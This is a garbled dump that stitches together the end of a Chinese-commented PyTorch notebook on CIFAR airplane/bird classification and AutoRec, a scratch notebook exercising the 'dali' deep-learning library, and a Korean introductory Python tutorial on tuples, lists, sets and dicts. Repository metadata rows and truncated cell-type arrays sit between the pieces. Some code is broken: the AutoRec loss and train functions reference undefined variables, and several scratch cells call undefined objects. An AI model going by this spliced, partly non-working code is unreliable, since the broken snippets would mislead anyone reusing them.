"# Build the dataset and DataLoader\n\nlabel_map = {0: 0, 2: 1} # 占位符\nclass_names = ['airplane', 'bird']\n# 训练集\ncifar2 = [(img, label_map[label])\n for img, label in tensor_cifar10_normalize_train\n if label in [0, 2]]\n# 验证集\ncifar2_val = [(img, label_map[label])\n for img, label in tensor_cifar10_normalize_val\n if label in [0, 2]]\n\ntrain_loader = torch.utils.data.DataLoader(cifar2, batch_size=64, shuffle=True)",
"_____no_output_____"
],
[
"class Animator: #@save\n \"\"\"在动画中绘制数据。\"\"\"\n def __init__(self, xlabel=None, ylabel=None, legend=None, xlim=None,\n ylim=None, xscale='linear', yscale='linear',\n fmts=('-', 'm--', 'g-.', 'r:'), nrows=1, ncols=1,\n figsize=(3.5, 2.5)):\n # 增量地绘制多条线\n if legend is None:\n legend = []\n d2l.use_svg_display()\n self.fig, self.axes = d2l.plt.subplots(nrows, ncols, figsize=figsize)\n if nrows * ncols == 1:\n self.axes = [self.axes, ]\n # 使用lambda函数捕获参数\n self.config_axes = lambda: d2l.set_axes(\n self.axes[0], xlabel, ylabel, xlim, ylim, xscale, yscale, legend)\n self.X, self.Y, self.fmts = None, None, fmts\n\n def add(self, x, y):\n # 向图表中添加多个数据点\n if not hasattr(y, \"__len__\"):\n y = [y]\n n = len(y)\n if not hasattr(x, \"__len__\"):\n x = [x] * n\n if not self.X:\n self.X = [[] for _ in range(n)]\n if not self.Y:\n self.Y = [[] for _ in range(n)]\n for i, (a, b) in enumerate(zip(x, y)):\n if a is not None and b is not None:\n self.X[i].append(a)\n self.Y[i].append(b)\n self.axes[0].cla()\n for x, y, fmt in zip(self.X, self.Y, self.fmts):\n self.axes[0].plot(x, y, fmt)\n self.config_axes()\n display.display(self.fig)\n display.clear_output(wait=True)",
"_____no_output_____"
],
[
"device = torch.device('cuda:0')\n\nmodel_F3 = nn.Sequential(\n nn.Linear(3072, 512),\n nn.Tanh(),\n nn.Linear(512, 2),\n nn.LogSoftmax(dim=1))\n\nmodel_F3.to(device)\nlr = 1e-2\noptimizer = optim.SGD(model_F3.parameters(),lr =lr)\nloss_fn = nn.NLLLoss()\nn_epochs = 100\n\n\nfor epoch in range(n_epochs):\n for imgs, labels in train_loader:\n imgs, labels = imgs.to(device), labels.to(device)\n \n batch_size = imgs.shape[0]\n outputs = model_F3(imgs.view(batch_size, -1))\n loss = loss_fn(outputs, labels)\n \n #out = model_F3(img.view(-1).unsqueeze(0)).to(device)\n #loss = loss_fn(out,torch.tensor([label]))\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n print(\"Epoch: %d, Loss: %f\" % (epoch, float(loss)))",
"_____no_output_____"
],
[
"class model_chap7(nn.Module):\n \n def __init__(self, config):\n super(model_chap7, self).__init__()\n #self._num_users = config['num_users']\n #self._num_items = config['num_items']\n #self._hidden_units = config['hidden_units']\n #self._lambda_value = config['lambda']\n self._config = config\n\n def forward(self,torch_input):\n\n encoder = self.encoder(torch_input)\n decoder = self.decoder(encoder)\n return decoder\n\n def loss(self,decoder,input,optimizer,mask_input):\n \n loss_fn = nn.NLLLoss()\n \n return cost,rmse",
"_____no_output_____"
],
[
"class NetWidth(nn.Module):\n \n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3, padding=1)\n self.conv2 = nn.Conv2d(32, 16, kernel_size=3, padding=1)\n self.fc1 = nn.Linear(16 * 8 * 8, 32)\n self.fc2 = nn.Linear(32, 2)\n \n def forward(self, x):\n out = F.max_pool2d(torch.tanh(self.conv1(x)), 2)\n out = F.max_pool2d(torch.tanh(self.conv2(out)), 2)\n out = out.view(-1, 16 * 8 * 8)\n out = torch.tanh(self.fc1(out))\n out = self.fc2(out)\n \n return out",
"_____no_output_____"
],
[
"autorec_config = \\\n{\n 'train_ratio': 0.9,\n 'num_epoch': 100,\n 'batch_size': 100,\n 'optimizer': 'SGD',\n 'adam_lr': 1e-2,\n 'lambda': 1,\n 'device_id': 2,\n 'use_cuda': True,\n 'model_name': 'model_chap7'\n}",
"_____no_output_____"
],
[
"# 实例化AutoRec对象\nmodel = model_chap7(autorec_config)",
"_____no_output_____"
],
[
"'''Train'''\ndef train(epoch):\n loss = 0\n \n for step, (batch_x, batch_y) in enumerate(train_loader):\n\n batch_x = batch_x.type(torch.FloatTensor)\n\n decoder = rec(batch_x) # 第一步,数据的前向传播,计算预测值\n loss, rmse = rec.loss(decoder=decoder, input=batch_x, optimizer=optimer, mask_input=batch_mask_x) # 第二步,计算误差\n optimer.zero_grad() # 反向传播前,梯度归零\n loss.backward() # 第三步,反向传播\n optimer.step() # 一步更新所有参数\n cost_all += loss\n RMSE += rmse\n\n RMSE = np.sqrt(RMSE.detach().cpu().numpy() / (train_mask_r == 1).sum())\n animator.add(epoch + 1, RMSE)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b12b3a64e497d27ac424bb8723fc3e13078a6 | 25,713 | ipynb | Jupyter Notebook | Pioneer.ipynb | JonathanRaiman/dali-cython-stub | e258469aeb1d4cb3e4cdf5c07e8948f461a038f1 | [
"MIT"
] | 7 | 2016-06-20T17:50:06.000Z | 2019-12-13T17:27:46.000Z | Pioneer.ipynb | JonathanRaiman/dali-cython | e258469aeb1d4cb3e4cdf5c07e8948f461a038f1 | [
"MIT"
] | 6 | 2015-08-04T07:25:38.000Z | 2015-08-13T22:06:22.000Z | Pioneer.ipynb | JonathanRaiman/dali-cython | e258469aeb1d4cb3e4cdf5c07e8948f461a038f1 | [
"MIT"
] | 2 | 2016-07-04T21:38:14.000Z | 2016-08-31T02:53:19.000Z | 26.700935 | 2,159 | 0.51577 | [
[
[
"from dali.core import MatOps, Mat, SGD, AdaGrad, RMSProp, AdaDelta, Adam, GRU, Graph, NoBackprop, config\nimport numpy as np",
"_____no_output_____"
],
[
"config.default_device = 'cpu'",
"_____no_output_____"
],
[
"# this works\nx = Mat(2, 3)\nh = Mat(2, 3)\nprint((x+h).dims())",
"(2, 3)\n"
],
[
"x = Mat(np.arange(6).reshape(2,3))",
"_____no_output_____"
],
[
"x.sum(axis=0)",
"_____no_output_____"
],
[
"MatOps.softmax(x, axis=0)",
"_____no_output_____"
],
[
"MatOps.softmax_cross_entropy(x, Mat([0,0,0], dtype=np.int32), axis=0)",
"_____no_output_____"
],
[
"params = [Mat(np.random.randn(3,3))]\nsgd = SGD(params)",
"_____no_output_____"
],
[
"gru.memory_to_memory_layer.",
"_____no_output_____"
],
[
"sgd",
"_____no_output_____"
],
[
"params[0].dw",
"_____no_output_____"
],
[
"params[0].w",
"_____no_output_____"
],
[
"#sgd.create_gradient_caches(params)",
"_____no_output_____"
],
[
"gru = GRU(10, 10)",
"_____no_output_____"
],
[
"gru.initial_states().shape",
"_____no_output_____"
],
[
"params[0].dw += 1\nsgd.step(params)",
"_____no_output_____"
],
[
"sgd.step_size = 0.5",
"_____no_output_____"
],
[
"params",
"_____no_output_____"
],
[
"MatOps.hstack(\n [\n Mat(3,3)\n ]\n)",
"_____no_output_____"
],
[
"x.name = \"bob\"",
"_____no_output_____"
],
[
"x.name",
"_____no_output_____"
],
[
"# this throws an exception\nx = test_dali.Mat(2, 3)\nh = test_dali.Mat(3, 3)\n#print( test_dali.Mat.add_mofos(x,h).dims() )\nprint((x / h).dims())",
"_____no_output_____"
],
[
"# this succeeds\nx = test_dali.Mat(2, 3)\nh = test_dali.Mat(3, 3)\nlayer = test_dali.RNN(2, 3, 3)\no = layer.activate(x, h)\nprint(o.dims())",
"(3, 3)\n"
],
[
"# this throws an exception\nx = test_dali.Mat(2, 3)\nh = test_dali.Mat(2, 3)\nlayer = test_dali.RNN(2, 3, 3)\no = layer.activate(x, h)\nprint(o.dims())",
"_____no_output_____"
],
[
"layer.hidden_size",
"_____no_output_____"
],
[
"x.__add__(h)",
"_____no_output_____"
],
[
"(x + h).dims()",
"_____no_output_____"
],
[
"x * h",
"_____no_output_____"
],
[
"vocab = test_dali.Vocab([\"a\", \"b\", \"c\"], True)",
"_____no_output_____"
],
[
"layer = test_dali.Layer(5, 3)",
"_____no_output_____"
],
[
"params = layer.parameters()",
"_____no_output_____"
],
[
"param = params[0]",
"_____no_output_____"
],
[
"layer.parameters()",
"_____no_output_____"
],
[
"slayer = test_dali.StackedInputLayer([5, 5, 5], 7)",
"_____no_output_____"
],
[
"slayer_knife = test_dali.Mat(5, 1)",
"_____no_output_____"
],
[
"slayer.activate([slayer_knife, slayer_knife, slayer_knife])",
"_____no_output_____"
],
[
"slayer.parameters()",
"_____no_output_____"
],
[
"slayer2.parameters()",
"_____no_output_____"
],
[
"test_dali.Graph.emplace_back(backprop)",
"_____no_output_____"
],
[
"test_dali.Graph.backward()",
"_____no_output_____"
],
[
"from test_dali import Graph,LSTM, GRU, StackedInputLayer, Layer, Mat, LSTMState, StackedLSTM, random as drandom, MatOps",
"_____no_output_____"
],
[
"import pickle",
"_____no_output_____"
],
[
"slstm = StackedLSTM([5,5], [3,3,3])",
"_____no_output_____"
],
[
"slstm.parameters()[0].w",
"_____no_output_____"
],
[
"slstm2 = pickle.loads(pickle.dumps(slstm))\nslstm2.parameters()[0]",
"_____no_output_____"
],
[
"mat = drandom.uniform(-4, 4, (100,100))",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b42aa322172fc82934bcfdbdf9cbd39db4965 | 583,151 | ipynb | Jupyter Notebook | Notebooks/SQLDBverify.ipynb | mggeorgiev/db-maintenance | 2357c36d4549055a9a9f56654abb830f9ce9078a | [
"MIT"
] | null | null | null | Notebooks/SQLDBverify.ipynb | mggeorgiev/db-maintenance | 2357c36d4549055a9a9f56654abb830f9ce9078a | [
"MIT"
] | null | null | null | Notebooks/SQLDBverify.ipynb | mggeorgiev/db-maintenance | 2357c36d4549055a9a9f56654abb830f9ce9078a | [
"MIT"
] | null | null | null | 54.41872 | 2,575 | 0.262899 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb2b457cc82e5aae3747bc9d66a6381da7ff90c8 | 53,428 | ipynb | Jupyter Notebook | Python-101-Part2.ipynb | danielykim/python-guide | cf9c2f83197d86d7776ac72c1a287da0933254a7 | [
"MIT"
] | 2 | 2019-05-22T01:41:53.000Z | 2019-06-23T07:34:07.000Z | Python-101-Part2.ipynb | danielykim/python-guide | cf9c2f83197d86d7776ac72c1a287da0933254a7 | [
"MIT"
] | null | null | null | Python-101-Part2.ipynb | danielykim/python-guide | cf9c2f83197d86d7776ac72c1a287da0933254a7 | [
"MIT"
] | null | null | null | 18.203748 | 81 | 0.471644 | [
[
[
"2018-10-26\n\n실용주의 파이썬 101 - Part 2\n\n[김영호](https://www.linkedin.com/in/danielyounghokim/)",
"_____no_output_____"
],
[
"난이도 ● ● ◐ ○ ○",
"_____no_output_____"
],
[
"# Data Structures\n- Immutable vs. Mutable\n - Immutable: `tuple`\n - Mutable: `list`, `set`, `dict`",
"_____no_output_____"
],
[
"- Mutable Container 설명 순서\n - 초기화\n - 추가/삭제\n - 특정 값 접근(access)\n - 정렬",
"_____no_output_____"
],
[
"## `tuple`",
"_____no_output_____"
],
[
"### 초기화",
"_____no_output_____"
]
],
[
[
"seq = ()",
"_____no_output_____"
],
[
"type(seq)",
"_____no_output_____"
],
[
"seq = (1, 2, 3)",
"_____no_output_____"
],
[
"seq",
"_____no_output_____"
]
],
[
[
"### 크기 확인",
"_____no_output_____"
]
],
[
[
"len(seq)",
"_____no_output_____"
]
],
[
[
"화면에 `(`와 `)`로 묶여 구분자 `,`와 함께 표시됩니다.",
"_____no_output_____"
]
],
[
[
"type(seq)",
"_____no_output_____"
]
],
[
[
"변수형이 달라도 됩니다.",
"_____no_output_____"
]
],
[
[
"('월', 10, '일', 26)",
"_____no_output_____"
]
],
[
[
"### 접근",
"_____no_output_____"
]
],
[
[
"seq[0]",
"_____no_output_____"
]
],
[
[
"### Immutability\n`tuple`로 정의한 것은 바꾸지 못합니다(immutable).",
"_____no_output_____"
]
],
[
[
"seq[0] = 4",
"_____no_output_____"
]
],
[
[
"### 분배",
"_____no_output_____"
]
],
[
[
"fruits_tuple = ('orange', 'apple', 'banana')",
"_____no_output_____"
],
[
"fruit1, fruit2, fruit3 = fruits_tuple",
"_____no_output_____"
],
[
"print(fruit1)\nprint(fruit2)\nprint(fruit3)",
"_____no_output_____"
]
],
[
[
"## `list`\n- 정말 많이 쓰기 때문에 굉장히 중요한 자료 구조",
"_____no_output_____"
],
[
"### 초기화",
"_____no_output_____"
]
],
[
[
"temp_list = []",
"_____no_output_____"
],
[
"type(temp_list)",
"_____no_output_____"
],
[
"temp_list = [1, 'a', 3.4]",
"_____no_output_____"
],
[
"temp_list",
"_____no_output_____"
]
],
[
[
"#### `list` of `tuple`s",
"_____no_output_____"
]
],
[
[
"temp_list = [\n ('김 책임', '남'),\n ('박 선임', '여'),\n ('이 수석', '남', 15),\n ('최 책임', '여')\n]",
"_____no_output_____"
]
],
[
[
"`tuple` 길이가 달라도 됩니다.",
"_____no_output_____"
],
[
"#### `list` of `list`s",
"_____no_output_____"
]
],
[
[
"temp_list = [\n ['김 책임', '남'],\n ['박 선임', '여'],\n ['이 수석', '남', 15],\n ['최 책임', '여']\n]",
"_____no_output_____"
]
],
[
[
"각 `list` 크기가 달라도 됩니다.\n\n`list` of `tuple`s 를 `list` of `list`s 로 쉽게 바꾸는 법?\n- Part 3 에서 다룹니다.",
"_____no_output_____"
],
[
"#### 동일한 값을 특정 개수만큼 초기화",
"_____no_output_____"
]
],
[
[
"temp_list = [0] * 10",
"_____no_output_____"
],
[
"temp_list",
"_____no_output_____"
]
],
[
[
"### 크기 확인",
"_____no_output_____"
]
],
[
[
"len(temp_list)",
"_____no_output_____"
]
],
[
[
"### 분배",
"_____no_output_____"
]
],
[
[
"fruits_list = ['orange', 'apple', 'banana']",
"_____no_output_____"
],
[
"fruit1, fruit2, fruit3 = fruits_list",
"_____no_output_____"
],
[
"print(fruit1)\nprint(fruit2)\nprint(fruit3)",
"_____no_output_____"
]
],
[
[
"### 추가",
"_____no_output_____"
]
],
[
[
"temp_list = []\n\ntemp_list.append('김 책임')\ntemp_list.append('이 수석')",
"_____no_output_____"
],
[
"temp_list",
"_____no_output_____"
]
],
[
[
"특정 위치에 추가",
"_____no_output_____"
]
],
[
[
"temp_list",
"_____no_output_____"
],
[
"temp_list.insert(1, '박 선임')",
"_____no_output_____"
],
[
"temp_list",
"_____no_output_____"
]
],
[
[
"### 삭제\n- ~~전 별로 안 씀~~",
"_____no_output_____"
],
[
"`remove(x)`는 `list`에서 첫 번째로 나오는 x를 삭제",
"_____no_output_____"
]
],
[
[
"l = ['a', 'b', 'c', 'd', 'b']\n\nl.remove('b')",
"_____no_output_____"
],
[
"l",
"_____no_output_____"
]
],
[
[
"한 번에 `b`를 다 지우는 방법은?\n- Part 3 에서 해봅시다.",
"_____no_output_____"
],
[
"### 특정 값 접근(Access) & 변경\n- 그냥 Array 라고 생각하면 편합니다.\n - Index는 0부터 시작",
"_____no_output_____"
]
],
[
[
"nums = [1, 2, 3, 4, 5]",
"_____no_output_____"
],
[
"nums[2] = 6",
"_____no_output_____"
],
[
"nums",
"_____no_output_____"
]
],
[
[
"#### slicing",
"_____no_output_____"
]
],
[
[
"nums = [1, 2, 3, 4, 5] # range는 파이썬에 구현되어 있는 함수이며 정수들로 구성된 리스트를 만듭니다\nprint(nums) # 출력 \"[0, 1, 2, 3, 4]\"\nprint(nums[2:4]) # 인덱스 2에서 4(제외)까지 슬라이싱; 출력 \"[2, 3]\"\nprint(nums[2:]) # 인덱스 2에서 끝까지 슬라이싱; 출력 \"[2, 3, 4]\"\nprint(nums[:2]) # 처음부터 인덱스 2(제외)까지 슬라이싱; 출력 \"[0, 1]\"\nprint(nums[:]) # 전체 리스트 슬라이싱; 출력 [\"0, 1, 2, 3, 4]\"\nprint(nums[:-1]) # 슬라이싱 인덱스는 음수도 가능; 출력 [\"0, 1, 2, 3]\"\nnums[2:4] = [8, 9] # 슬라이스된 리스트에 새로운 리스트 할당\nprint(nums) # 출력 \"[0, 1, 8, 9, 4]\"",
"_____no_output_____"
]
],
[
[
"#### Slicing & Changing",
"_____no_output_____"
]
],
[
[
"nums = [1, 2, 3, 4, 5]",
"_____no_output_____"
],
[
"nums[1:3] = [6, 7]",
"_____no_output_____"
],
[
"nums",
"_____no_output_____"
]
],
[
[
"### 기타 등등: 뒤집기, ...",
"_____no_output_____"
]
],
[
[
"nums = [1, 2, 3, 4, 5]",
"_____no_output_____"
],
[
"nums[::-1]",
"_____no_output_____"
]
],
[
[
"홀수 index 만 순방향으로 access",
"_____no_output_____"
]
],
[
[
"nums[::2]",
"_____no_output_____"
]
],
[
[
"역방향으로 홀수 index만 access",
"_____no_output_____"
]
],
[
[
"nums[::-2]",
"_____no_output_____"
]
],
[
[
"### 정렬\n- `sorted` 라는 내장 함수 사용\n- `.sort()` → inplace",
"_____no_output_____"
]
],
[
[
"temp_list = [3, 2, 5, 8, 1, 7]",
"_____no_output_____"
],
[
"sorted(temp_list)",
"_____no_output_____"
],
[
"sorted(temp_list, reverse = True)",
"_____no_output_____"
]
],
[
[
"### 특정 값 존재 여부",
"_____no_output_____"
]
],
[
[
"temp_list = ['김 책임', '박 선임', '이 수석']",
"_____no_output_____"
],
[
"'김 책임' in temp_list",
"_____no_output_____"
],
[
"'이 선임' in temp_list",
"_____no_output_____"
]
],
[
[
"### `list` ↔ `tuple`",
"_____no_output_____"
]
],
[
[
"temp_list = [1, 2, 3, 4, 5]",
"_____no_output_____"
],
[
"tuple(temp_list)",
"_____no_output_____"
],
[
"type(tuple(temp_list))",
"_____no_output_____"
]
],
[
[
"### `str` & `list`",
"_____no_output_____"
],
[
"#### `split()`: 문자열 분리(tokenization)",
"_____no_output_____"
]
],
[
[
"multi_line_str = '''\n\n이름: 김영호\n직급: 책임컨설턴트\n소속: 데이터분석그룹\n\n'''\nprint(multi_line_str)",
"_____no_output_____"
],
[
"multi_line_str",
"_____no_output_____"
],
[
"multi_line_str.strip()",
"_____no_output_____"
],
[
"multi_line_str.strip().split('\\n')",
"_____no_output_____"
]
],
[
[
"#### `str` 쪼개기",
"_____no_output_____"
]
],
[
[
"tokens = multi_line_str.strip().split('\\n')",
"_____no_output_____"
],
[
"tokens",
"_____no_output_____"
]
],
[
[
"#### 여러 `str` 합치기",
"_____no_output_____"
]
],
[
[
"'\\n'.join(tokens)",
"_____no_output_____"
]
],
[
[
"### 여러 `list` 합치기",
"_____no_output_____"
]
],
[
[
"l1 = [1, 2, 3, 4, 5]\nl2 = ['a', 'b', 'c']\nl3 = ['*', '!', '%', '$']",
"_____no_output_____"
],
[
"# BETTER (Python 2.7+)\n[*l1, *l2, *l3]",
"_____no_output_____"
],
[
"# For (Python 2.6-)\nl = []\n\nl.extend(l1)\nl.extend(l2)\nl.extend(l3)",
"_____no_output_____"
],
[
"l",
"_____no_output_____"
]
],
[
[
"## `set`\n- 용도: 중복 제거",
"_____no_output_____"
],
[
"### 초기화",
"_____no_output_____"
]
],
[
[
"temp_set = set()",
"_____no_output_____"
],
[
"type(temp_set)",
"_____no_output_____"
]
],
[
[
"`tuple`을 넣어서 초기화 할 수도 있습니다.",
"_____no_output_____"
]
],
[
[
"temp_set = set((1, 2, 1, 3))",
"_____no_output_____"
],
[
"temp_set",
"_____no_output_____"
]
],
[
[
"중복이 제거된 것에 주목하세요. `{`와 `}` 사이에 값은 `,`로 구분되어 표시됩니다.",
"_____no_output_____"
],
[
"`list`도 넣어서 초기화 할 수 있습니다.",
"_____no_output_____"
]
],
[
[
"temp_set = set([1, 2, 1, 3])",
"_____no_output_____"
]
],
[
[
"아래와 같이 초기화 할 수도 있습니다.",
"_____no_output_____"
]
],
[
[
"temp_set = {1, 2, 1, 3}",
"_____no_output_____"
],
[
"type(temp_set)",
"_____no_output_____"
]
],
[
[
"### 크기 확인",
"_____no_output_____"
]
],
[
[
"len(temp_set)",
"_____no_output_____"
]
],
[
[
"### 추가",
"_____no_output_____"
]
],
[
[
"temp_set = set([1, 2])",
"_____no_output_____"
],
[
"temp_set.add(1)",
"_____no_output_____"
],
[
"temp_set",
"_____no_output_____"
]
],
[
[
"여러개의 값 한번에 추가하기",
"_____no_output_____"
]
],
[
[
"temp_set.update([2, 3, 4])",
"_____no_output_____"
],
[
"temp_set",
"_____no_output_____"
]
],
[
[
"### 삭제",
"_____no_output_____"
]
],
[
[
"temp_set = set([1, 2, 3])",
"_____no_output_____"
],
[
"temp_set.remove(2)",
"_____no_output_____"
],
[
"temp_set",
"_____no_output_____"
]
],
[
[
"### 특정 값 접근\n- Random access 안 됨",
"_____no_output_____"
],
[
"### 특정 값 존재 여부",
"_____no_output_____"
]
],
[
[
"temp_set = set(['김 책임', '박 선임', '이 수석'])",
"_____no_output_____"
],
[
"'김 책임' in temp_set",
"_____no_output_____"
],
[
"'김 책임님' in temp_set",
"_____no_output_____"
]
],
[
[
"### 연산\n- 참조: https://github.com/brennerm/PyTricks/blob/master/setoperators.py",
"_____no_output_____"
],
[
"#### 합집합: Union",
"_____no_output_____"
]
],
[
[
"food_set1 = {'짬뽕', '파스타', '쌀국수'}\nfood_set2 = {'짬뽕', '탕수육', '볶음밥'}",
"_____no_output_____"
],
[
"food_set1.union(food_set2)",
"_____no_output_____"
]
],
[
[
"#### 교집합: Intersection",
"_____no_output_____"
]
],
[
[
"food_set1.intersection(food_set2)",
"_____no_output_____"
]
],
[
[
"#### 차집합: Difference",
"_____no_output_____"
]
],
[
[
"food_set1.difference(food_set2)",
"_____no_output_____"
]
],
[
[
"비교해서 겹치는 것을 제외합니다.",
"_____no_output_____"
],
[
"### `list` ↔ `set`\n- `list` 안에 immutable object 들만 있을 때 가능",
"_____no_output_____"
],
[
"## `dict`\n- 이것도 정말 많이 쓰는 핵심적인 자료 구조\n- **`key`와 `value`의 쌍들**이 들어감\n - `key`\n - immutable 만 가능\n - 중복 불가\n - `value`\n - mutable 도 가능",
"_____no_output_____"
],
[
"### 초기화",
"_____no_output_____"
]
],
[
[
"temp_dict = {}",
"_____no_output_____"
],
[
"type(temp_dict)",
"_____no_output_____"
],
[
"temp_dict = {\n '이름' : '김영호',\n '사업부' : 'IT혁신사업부', \n '소속' : '데이터분석그룹'\n}",
"_____no_output_____"
]
],
[
[
"### 크기 확인",
"_____no_output_____"
]
],
[
[
"len(temp_dict)",
"_____no_output_____"
]
],
[
[
"### 추가",
"_____no_output_____"
]
],
[
[
"temp_dict = {}\n\ntemp_dict['근속연차'] = 3",
"_____no_output_____"
],
[
"temp_dict['근속연차'] += 1",
"_____no_output_____"
],
[
"temp_dict['근속연차']",
"_____no_output_____"
],
[
"temp_dict['좋아하는 음식'] = set()",
"_____no_output_____"
],
[
"temp_dict['좋아하는 음식']",
"_____no_output_____"
],
[
"temp_dict['좋아하는 음식'].add('짬뽕')\ntemp_dict['좋아하는 음식'].add('파스타')\ntemp_dict['좋아하는 음식'].add('쌀국수')",
"_____no_output_____"
],
[
"temp_dict['좋아하는 음식']",
"_____no_output_____"
]
],
[
[
"Key 가 없을 때 `dict`를 효율적으로 다루는 방법\n- Standard Library 시간에 다룹니다.",
"_____no_output_____"
],
[
"### 삭제\n- ~~삭제는 별로 안 씀~~",
"_____no_output_____"
],
[
"### 특정 Key 접근",
"_____no_output_____"
]
],
[
[
"temp_dict = {\n '김 책임' : '남',\n '박 선임' : '여',\n '이 수석' : '남',\n '최 책임' : '여'\n}",
"_____no_output_____"
],
[
"temp_dict['김 책임']",
"_____no_output_____"
]
],
[
[
"Key 가 없을 떄?",
"_____no_output_____"
]
],
[
[
"temp_dict['양 책임']",
"_____no_output_____"
]
],
[
[
"에러 납니다.\n\n오류/예외 처리는?",
"_____no_output_____"
]
],
[
[
"temp_dict.get('양 책임')",
"_____no_output_____"
],
[
"temp_dict.get('양 책임', '키 없음')",
"_____no_output_____"
]
],
[
[
"### 특정 `key` 존재 여부",
"_____no_output_____"
]
],
[
[
"temp_dict = {\n '김 책임' : '남',\n '박 선임' : '여',\n '이 수석' : '남',\n '최 책임' : '여'\n}",
"_____no_output_____"
],
[
"'김 책임' in temp_dict",
"_____no_output_____"
]
],
[
[
"### `list` of `tuple`s → `dict`",
"_____no_output_____"
]
],
[
[
"list_of_tuples = [ \n ('김 책임', 'M+'),\n ('박 선임', 'M'),\n ('이 수석', 'E')\n]",
"_____no_output_____"
],
[
"d1 = dict(list_of_tuples)",
"_____no_output_____"
],
[
"d1",
"_____no_output_____"
],
[
"l1 = ['김 책임', '박 선임', '이 수석']\nl2 = ['M+', 'M', 'E']\n\nd2 = dict(zip(l1, l2))",
"_____no_output_____"
],
[
"d2",
"_____no_output_____"
],
[
"d1 == d2",
"_____no_output_____"
]
],
[
[
"### 여러 `dict` 합치기",
"_____no_output_____"
]
],
[
[
"d1 = {\n '김선임' : 'M+',\n '박선임' : 'M',\n '이수석' : 'E'\n}\n\nd2 = {\n 'Apple' : 'Red',\n 'Banana' : 'Yellow'\n}\n\nd3 = {\n 'ABC' : 'DEF',\n 'GHI' : 'JKL'\n}",
"_____no_output_____"
],
[
"d = {**d1, **d2, **d3}",
"_____no_output_____"
],
[
"d",
"_____no_output_____"
]
],
[
[
"### More on string formatting",
"_____no_output_____"
]
],
[
[
"temp_dict = {\n 'name' : '김영호',\n 'affiliation' : '삼성SDS', \n}\n\n\nformatted_string = '''\n이름: {name}\n소속: {affiliation}\n'''.format(**temp_dict)",
"_____no_output_____"
],
[
"formatted_string",
"_____no_output_____"
]
],
[
[
"Part 2 끝",
"_____no_output_____"
],
[
"참조\n- https://docs.python.org/ko/3/contents.html\n - https://docs.python.org/ko/3/tutorial/index.html\n- https://docs.python.org/3.7/howto/\n- http://cs231n.github.io/python-numpy-tutorial/\n- [점프 투 파이썬](https://wikidocs.net/book/1)\n - https://docs.python-guide.org/",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
